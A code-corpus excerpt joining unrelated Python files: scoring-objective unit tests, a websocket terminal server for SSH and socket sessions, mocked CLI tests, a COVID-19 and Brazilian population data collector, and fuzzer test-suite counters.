for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([np.inf, 0, 0])
y_predicted = np.array([1, 0, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="y_true contains NaN or infinity"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, np.inf], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"):
objective.score(y_true, y_predicted_proba)
def test_different_input_lengths():
y_predicted = np.array([0, 0])
y_true = np.array([1])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Inputs have mismatched dimensions"):
objective.score(y_true, y_predicted)
y_true = np.array([0, 0])
y_predicted = np.array([1, 2, 0])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Inputs have mismatched dimensions"):
objective.score(y_true, y_predicted)
def test_zero_input_lengths():
y_predicted = np.array([])
y_true = np.array([])
for objective in all_automl_objectives.values():
with pytest.raises(ValueError, match="Length of inputs is 0"):
objective.score(y_true, y_predicted)
def test_probabilities_not_in_0_1_range():
y_predicted = np.array([0.3, 1.001, 0.3])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted)
y_predicted = np.array([0.3, -0.001, 0.3])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted)
y_true = np.array([1, 0])
y_predicted_proba = np.array([[1, 3], [0.1, 0]])
for objective in all_automl_objectives.values():
if objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains probability estimates"):
objective.score(y_true, y_predicted_proba)
def test_negative_with_log():
y_predicted = np.array([-1, 10, 30])
y_true = np.array([-1, 0, 1])
for objective in [MeanSquaredLogError(), RootMeanSquaredLogError()]:
with pytest.raises(ValueError, match="Mean Squared Logarithmic Error cannot be used when targets contain negative values."):
objective.score(y_true, y_predicted)
def test_binary_more_than_two_unique_values():
y_predicted = np.array([0, 1, 2])
y_true = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba:
with pytest.raises(ValueError, match="y_predicted contains more than two unique values"):
objective.score(y_true, y_predicted)
y_true = np.array([0, 1, 2])
y_predicted = np.array([1, 0, 1])
for objective in all_automl_objectives.values():
if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba:
with pytest.raises(ValueError, match="y_true contains more than two unique values"):
objective.score(y_true, y_predicted)
def test_accuracy_binary():
obj = AccuracyBinary()
assert obj.score(np.array([0, 0, 1, 1]),
np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS)
def test_accuracy_multi():
obj = AccuracyMulticlass()
assert obj.score(np.array([0, 0, 1, 1]),
np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 1, 1]),
np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 1, 1, 2, 2]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([0, 0, 1, 1, 2, 2])) == pytest.approx(1 / 3.0, EPS)
def test_balanced_accuracy_binary():
obj = BalancedAccuracyBinary()
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.625, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 1, 0])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([1, 0, 1, 1, 0, 1])) == pytest.approx(0.0, EPS)
def test_balanced_accuracy_multi():
obj = BalancedAccuracyMulticlass()
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([0, 0, 2, 0, 0, 2, 3])) == pytest.approx(0.75, EPS)
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([0, 1, 2, 0, 1, 2, 3])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]),
np.array([1, 0, 3, 1, 2, 1, 0])) == pytest.approx(0.0, EPS)
def test_f1_binary():
obj = F1()
assert obj.score(np.array([0, 1, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 1, 0, 0, 1, 1]),
np.array([0, 1, 0, 0, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 1, 0]),
np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_micro_multi():
obj = F1Micro()
assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 2]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_macro_multi():
obj = F1Macro()
assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) \
== pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 2]),
np.array([0, 0])) == pytest.approx(0.0, EPS)
def test_f1_weighted_multi():
obj = F1Weighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) \
== pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_binary():
obj = Precision()
assert obj.score(np.array([1, 1, 1, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.5, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0, 0, 0, 0, 0]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS)
def test_precision_micro_multi():
obj = PrecisionMicro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_macro_multi():
obj = PrecisionMacro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_weighted_multi():
obj = PrecisionWeighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_binary():
obj = Recall()
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 1, 1, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(0.5, EPS)
def test_recall_micro_multi():
obj = RecallMicro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_macro_multi():
obj = RecallMacro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_weighted_multi():
obj = RecallWeighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_log_linear_model():
obj = MeanSquaredLogError()
root_obj = RootMeanSquaredLogError()
s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])
s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])
assert obj.score(s1_predicted, s1_actual) == pytest.approx(0.562467324910)
assert obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert obj.score(s3_predicted, s3_actual) == pytest.approx(0.617267976207983)
assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(0.562467324910))
assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(0.617267976207983))
def test_mse_linear_model():
obj = MSE()
root_obj = RootMeanSquaredError()
s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])
s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])
assert obj.score(s1_predicted, s1_actual) == pytest.approx(5. / 3.)
assert obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert obj.score(s3_predicted, s3_actual) == pytest.approx(2.)
assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(5. / 3.))
assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(2.))
def test_mcc_catches_warnings():
y_true = [1, 0, 1, 1]
y_predicted = [0, 0, 0, 0]
with pytest.warns(RuntimeWarning) as record:
sk_matthews_corrcoef(y_true, y_predicted)
assert "invalid value" in str(record[-1].message)
with pytest.warns(None) as record:
MCCBinary().objective_function(y_true, y_predicted)
MCCMulticlass().objective_function(y_true, y_predicted)
assert len(record) == 0
def test_mape_time_series_model():
obj = MAPE()
s1_actual = np.array([0, 0, 1, 1, 1, 1, 2, 0, 2])
s1_predicted = np.array([0, 1, 0, 1, 1, 2, 1, 2, 0])
s2_actual = np.array([-1, -2, 1, 3])
s2_predicted = np.array([1, 2, -1, -3])
s3_actual = np.array([1, 2, 4, 2, 1, 2])
s3_predicted = np.array([0, 2, 2, 1, 3, 2])
with pytest.raises(ValueError, match="Mean Absolute Percentage Error cannot be used when targets contain the value 0."):
obj.score(s1_actual, s1_predicted)
assert obj.score(s2_actual, s2_predicted) == pytest.approx(8 / 4 * 100)
assert obj.score(s3_actual, s3_predicted) == pytest.approx(4 / 6 * 100)
assert obj.score(pd.Series(s3_actual, index=range(-12, -6)), s3_predicted) == pytest.approx(4 / 6 * 100)
assert obj.score(pd.Series(s2_actual, index=range(10, 14)),
pd.Series(s2_predicted, index=range(20, 24))) == pytest.approx(8 / 4 * 100)
@pytest.mark.parametrize("objective_class", _all_objectives_dict().values())
def test_calculate_percent_difference(objective_class):
score = 5
reference_score = 10
change = ((-1) ** (not objective_class.greater_is_better) * (score - reference_score)) / reference_score
answer = 100 * change
assert objective_class.calculate_percent_difference(score, reference_score) == answer
assert objective_class.perfect_score is not None
@pytest.mark.parametrize("objective_class,nan_value", product(_all_objectives_dict().values(), [None, np.nan]))
def test_calculate_percent_difference_with_nan(objective_class, nan_value):
assert pd.isna(objective_class.calculate_percent_difference(nan_value, 2))
assert pd.isna(objective_class.calculate_percent_difference(-1, nan_value))
assert pd.isna(objective_class.calculate_percent_difference(nan_value, nan_value))
assert pd.isna(objective_class.calculate_percent_difference(2, 0))
def test_calculate_percent_difference_negative_and_equal_numbers():
assert CostBenefitMatrix.calculate_percent_difference(score=5, baseline_score=5) == 0
assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=-10) == 50
assert CostBenefitMatrix.calculate_percent_difference(score=-10, baseline_score=-5) == -100
assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=10) == -150
assert CostBenefitMatrix.calculate_percent_difference(score=10, baseline_score=-5) == 300
# These values are not possible for LogLossBinary but we need them for 100% coverage
# We might add an objective where lower is better that can take negative values in the future
assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=-10) == -50
assert LogLossBinary.calculate_percent_difference(score=-10, baseline_score=-5) == 100
assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=10) == 150
assert LogLossBinary.calculate_percent_difference(score=10, baseline_score=-5) == -300
def test_calculate_percent_difference_small():
expected_value = 100 * -1 * np.abs(1e-9 / (1e-9))
assert np.isclose(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-9), expected_value, atol=1e-8)
assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-10))
assert pd.isna(ExpVariance.calculate_percent_difference(score=1e-9, baseline_score=0))
assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=0))
| 2.28125 | 2 |
server-python3/server.py | Aaron-Ming/websocket_terminal | 40 | 7842 | <reponame>Aaron-Ming/websocket_terminal<filename>server-python3/server.py<gh_stars>10-100
import os
import urllib.parse
import eventlet
import eventlet.green.socket
# eventlet.monkey_patch()
import eventlet.websocket
import eventlet.wsgi
import wspty.pipe
from flask import Flask, request, redirect
from wspty.EchoTerminal import EchoTerminal
from wspty.EncodedTerminal import EncodedTerminal
from wspty.WebsocketBinding import WebsocketBinding
import config
def make_app():
app = Flask(__name__)
app.static_folder = get_static_folder()
print("Serving static files from: " + app.static_folder)
@app.route('/')
def index():
newurl = b'/static/index.html'
if request.query_string:
newurl = newurl + b'?' + request.query_string
return redirect(newurl)
return app
def parse_query(qstr):
return {k: v[0] for k, v in urllib.parse.parse_qs(qstr).items()}
def debug(s):
app.logger.debug(s)
class TerminalFactory:
def __init__(self, args_dict, allow_unsafe=False):
self.kind = args_dict['kind']
self.hostname = args_dict.get('hostname', 'localhost')
self.port = int(args_dict.get('port', '22'))
self.username = args_dict.get('username')
self.password = args_dict.get('password')
self.term = args_dict.get('term')
self.encoding = args_dict.get('encoding', 'utf8')
self.allow_unsafe = allow_unsafe
def create_binary(self):
if self.kind == 'ssh':
from wspty.SshTerminal import SshTerminal
return SshTerminal(
self.hostname, self.port, self.username, self.password, self.term
)
if self.kind == 'raw':
from wspty.SocketTerminal import SocketTerminal
sock = eventlet.green.socket.socket()
ip = eventlet.green.socket.gethostbyname(self.hostname)
sock.connect((ip, self.port))
return SocketTerminal(sock)
if self.kind == 'echo':
return EchoTerminal()
if self.kind == 'prompt':
if not self.allow_unsafe:
raise Exception("kind {} is disabled".format(self.kind))
from wspty import PromptTerminal
return PromptTerminal.os_terminal()
        raise NotImplementedError('kind: {}'.format(self.kind))  # NotImplemented is not an exception type
def create(self):
return EncodedTerminal(self.create_binary(), self.encoding)
class DefaultRootApp:
def __init__(self):
self._app_handle_wssh = eventlet.websocket.WebSocketWSGI(self.handle_wssh)
self.allow_unsafe = False
def handle_wssh(self, ws):
debug('Creating terminal with remote {remote}'.format(
remote=ws.environ.get('REMOTE_ADDR'),
))
ws_binding = WebsocketBinding(ws)
query = parse_query(ws.environ.get('QUERY_STRING', ''))
terminal = None
try:
kind, terminal = self.create_terminal(query)
ws_binding.send('Connected to %s\r\n' % (kind,))
wspty.pipe.pipe(ws_binding, terminal)
except BaseException as e:
ws_binding.send_error(e)
raise
finally:
if terminal:
terminal.close()
debug('Closing terminal normally with remote {remote}'.format(
remote=ws.environ.get('REMOTE_ADDR'),
))
return ''
def create_terminal(self, obj):
factory = TerminalFactory(obj, self.allow_unsafe)
return factory.kind, factory.create()
def handler(self, env, *args):
route = env["PATH_INFO"]
if route == '/wssh':
return self._app_handle_wssh(env, *args)
else:
return app(env, *args)
def make_parser():
import argparse
parser = argparse.ArgumentParser(description='Websocket Terminal server')
parser.add_argument('-l', '--listen', default='', help='Listen on interface (default all)')
parser.add_argument('-p', '--port', default=5002, type=int, help='Listen on port')
parser.add_argument('--unsafe', action='store_true', help='Allow unauthenticated connections to local machine')
return parser
def start(interface, port, root_app_handler):
conn = (interface, port)
listener = eventlet.listen(conn)
print('listening on {0}:{1}'.format(*conn))
try:
eventlet.wsgi.server(listener, root_app_handler)
except KeyboardInterrupt:
pass
def start_default(interface, port, allow_unsafe=False, root_app_cls=DefaultRootApp):
root_app = root_app_cls()
root_app.allow_unsafe = allow_unsafe
start(interface, port, root_app.handler)
def main():
args = make_parser().parse_args()
start_default(args.listen, args.port, args.unsafe)
def get_static_folder():
path_root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../client')
path_root = os.path.join(path_root, config.CLIENT_DIR)
return os.path.abspath(path_root)
app = make_app()
if __name__ == '__main__':
main()
| 2.4375 | 2 |
tests/unit/test_roger_promote.py | seomoz/roger-mesos-tools | 0 | 7843 | # -*- encoding: utf-8 -*-
"""
Unit test for roger_promote.py
"""
import tests.helper
import unittest
import os
import os.path
import pytest
import requests
from mockito import mock, Mock, when
from cli.roger_promote import RogerPromote
from cli.appconfig import AppConfig
from cli.settings import Settings
from cli.framework import Framework
from cli.frameworkUtils import FrameworkUtils
from cli.marathon import Marathon
from cli.chronos import Chronos
class TestRogerPromote(unittest.TestCase):
def setUp(self):
self.marathon = mock(Marathon)
self.settings = mock(Settings)
self.app_config = mock(AppConfig)
self.framework = self.marathon
self.framework_utils = mock(FrameworkUtils)
self.config_file = "test.yml"
self.roger_env = {}
os.environ['ROGER_CONFIG_DIR'] = '/vagrant/config'
@property
def config_dir(self):
return os.environ['ROGER_CONFIG_DIR']
def test_config_dir(self):
rp = RogerPromote()
assert rp.config_dir == '/vagrant/config'
def test_roger_env(self):
fake_config = tests.helper.fake_config()
settings = mock(Settings)
when(self.app_config).getRogerEnv(
self.config_dir
).thenReturn(fake_config)
rp = RogerPromote(app_config=self.app_config)
assert rp.roger_env == fake_config
def test_set_framework(self):
app_data = {'test_app': {'name': 'test_app'}}
when(self.app_config).getAppData(
self.config_dir, self.config_file, 'test_app'
).thenReturn(app_data)
rp = RogerPromote(app_config=self.app_config)
rp._set_framework(self.config_file, 'test_app')
assert rp._framework.getName() == 'Marathon'
def test_image_name(self):
os.environ['ROGER_USER'] = "first.last"
os.environ['ROGER_USER_PASS_DEV'] = "password"
os.environ['ROGER_USER_PASS_STAGE'] = "password"
os.environ['ROGER_USER_PASS_PROD'] = "password"
framework = mock(Marathon)
when(framework).getName().thenReturn("Marathon")
when(framework).get_app_id(
"test_path/test_app.json",
"Marathon"
).thenReturn("app_id")
when(framework).get_image_name(
'first.last',
"password",
"dev",
"app_id",
self.config_dir,
self.config_file
).thenReturn("test_image")
rp = RogerPromote(framework=framework)
assert rp._image_name(
'dev',
self.config_file,
"test_path/test_app.json") == 'test_image'
def test_config_resolver(self):
framework = mock(Framework)
settings = mock(Settings)
app_config = mock(AppConfig)
config_dir = '/vagrant/config'
fake_team_config = tests.helper.fake_team_config()
when(settings).getConfigDir().thenReturn(config_dir)
when(app_config).getConfig(
config_dir, 'roger.json'
).thenReturn(fake_team_config)
rp = RogerPromote(settings=settings, app_config=app_config)
val = rp._config_resolver('template_path', 'test_app', 'roger.json')
assert val == 'framework_template_path'
def test_roger_push_script(self):
path = RogerPromote()._roger_push_script()
assert 'roger-mesos-tools/cli/roger_push.py' in path
| 2.21875 | 2 |
data/collectors.py | papb/COVID-19 | 6 | 7844 | <filename>data/collectors.py
import json
import pandas as pd
import requests
def load_dump_covid_19_data():
COVID_19_BY_CITY_URL='https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-cities-time.csv'
by_city=(pd.read_csv(COVID_19_BY_CITY_URL)
.query('country == "Brazil"')
.drop(columns=['country'])
.pipe(lambda df: df[df.state!='TOTAL'])
.assign(city=lambda df: df.city.apply(lambda x: x.split('/')[0]))
.rename(columns={'totalCases': 'cases',
'newCases': 'new_cases',
'state': 'uf'})
.sort_values(by=['city', 'date'])
)
by_uf = (by_city
.groupby(['date', 'uf'])
             [['new_cases', 'cases']]  # select columns with a list to avoid deprecated tuple indexing
.sum()
.reset_index())
dfs = [by_uf, by_city]
filenames = ['by_uf', 'by_city']
for df, filename in zip(dfs, filenames):
output_path = f'data/csv/covid_19/{filename}/{filename}.csv'
df.to_csv(output_path, index=False)
print(f'{filename} data exported to {output_path}')
def load_dump_uf_pop():
IBGE_POPULATION_EXCEL_URL = 'ftp://ftp.ibge.gov.br/Estimativas_de_Populacao/Estimativas_2019/estimativa_dou_2019.xls'
def _load_uf_codes():
print('Scraping UF codes')
return (
pd.read_html(
'https://www.oobj.com.br/bc/article/'
'quais-os-c%C3%B3digos-de-cada-uf-no-brasil-465.html'
)
[0]
.replace('\s\(\*\)', '', regex=True)
.rename(columns={'UF': 'uf'})
[['Unidade da Federação', 'uf']]
)
def _load_uf_capitals():
print('Scraping UF capital names')
return (
pd.read_html(
'https://www.estadosecapitaisdobrasil.com/'
)
[0]
.rename(columns={'Sigla': 'uf', 'Capital': 'city'})
[['uf', 'city']]
)
# TODO: download excel file only once
def _download_ibge_excel_file(url):
pass
def _load_city_pop():
print('Scraping city population')
return (
pd.read_excel(IBGE_POPULATION_EXCEL_URL, sheet_name='Municípios', header=1)
.rename(columns={
'COD. UF': 'UF_code',
'COD. MUNIC': 'city_code',
'NOME DO MUNICÍPIO': 'city',
'POPULAÇÃO ESTIMADA': 'estimated_population'
})
.dropna(how='any')
.assign(estimated_population=lambda df: df.estimated_population
.replace('\.', '', regex=True)
.replace('\-', ' ', regex=True)
.replace('\(\d+\)', '', regex=True)
.astype('int')
)
.assign( UF_code=lambda df: df.UF_code.astype(int))
.assign(city_code=lambda df: df.city_code.astype(int))
.rename(columns={'UF': 'uf'})
[['uf', 'city', 'estimated_population']]
)
def _load_uf_pop():
print('Scraping UF population')
uf_codes = _load_uf_codes()
return (
pd.read_excel(IBGE_POPULATION_EXCEL_URL, header=1)
.drop(columns=['Unnamed: 1'])
.rename(columns={'POPULAÇÃO ESTIMADA': 'estimated_population'})
.dropna(how='any')
.assign(estimated_population=lambda df: df.estimated_population
.replace('\.', '', regex=True)
.replace('\-', ' ', regex=True)
.replace('\(\d\)', '', regex=True)
.astype('int')
)
.pipe(lambda df: pd.merge(df,
uf_codes,
left_on='BRASIL E UNIDADES DA FEDERAÇÃO',
right_on='Unidade da Federação',
how='inner'))
[['uf', 'estimated_population']]
)
uf_pop, city_pop, uf_capitals = (_load_uf_pop(),
_load_city_pop(),
_load_uf_capitals())
print('Combining uf and city data')
uf_pop = (
uf_pop
# Add capital city name
.merge(
uf_capitals,
how='left',
on='uf'
)
# Add capital population
.merge(
city_pop,
how='left',
on=['uf', 'city']
)
.rename(
columns={
'estimated_population_x': 'estimated_population',
'estimated_population_y': 'capital_estimated_population'
}
)
)
dfs = [uf_pop, city_pop]
filenames = ['by_uf', 'by_city']
for df, filename in zip(dfs, filenames):
output_path = f'data/csv/population/{filename}/{filename}.csv'
df.to_csv(output_path, index=False)
print(f'{filename} data exported to {output_path}')
def load_jh_df(csv):
'''
Loads a CSV file from JH repository and make some transforms
'''
jh_data_path = (
'https://raw.githubusercontent.com/'
'CSSEGISandData/COVID-19/master/'
'csse_covid_19_data/csse_covid_19_time_series/'
)
return (
pd.read_csv(
jh_data_path
+ csv[1]
)
.drop(['Lat', 'Long'], axis=1)
.groupby('Country/Region')
.sum()
.reset_index()
.rename(
columns={'Country/Region':'country'}
)
.melt(
id_vars=['country'],
var_name='date',
value_name=csv[0]
)
.assign(
date=lambda x: pd.to_datetime(
x['date'],
format='%m/%d/%y'
)
)
)
def load_jh_data():
'''
Loads the latest COVID-19 global data from
Johns Hopkins University repository
'''
cases_csv = ('cases', 'time_series_19-covid-Confirmed.csv')
deaths_csv = ('deaths', 'time_series_19-covid-Deaths.csv')
recovered_csv = ('recoveries', 'time_series_19-covid-Recovered.csv')
return (
pd.merge(
pd.merge(
load_jh_df(cases_csv),
load_jh_df(deaths_csv)
),
load_jh_df(recovered_csv)
)
.reindex(
columns = ['date',
'cases',
'deaths',
'recoveries',
'country']
)
)
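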
if __name__ == '__main__':
try:
load_dump_covid_19_data()
except Exception as e:
print(f'Error when collecting COVID-19 cases data: {repr(e)}')
try:
load_dump_uf_pop()
except Exception as e:
print(f'Error when collecting population data: {repr(e)}')
| 3.109375 | 3 |
testsuite/testsuite_helpers.py | freingruber/JavaScript-Raider | 91 | 7845 | <gh_stars>10-100
import config as cfg
import utils
import native_code.executor as executor
number_performed_tests = 0
expectations_correct = 0
expectations_wrong = 0
def reset_stats():
global number_performed_tests, expectations_correct, expectations_wrong
number_performed_tests = 0
expectations_correct = 0
expectations_wrong = 0
def get_number_performed_tests():
global number_performed_tests
return number_performed_tests
def get_expectations_correct():
global expectations_correct
return expectations_correct
def get_expectations_wrong():
global expectations_wrong
return expectations_wrong
def assert_success(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS")
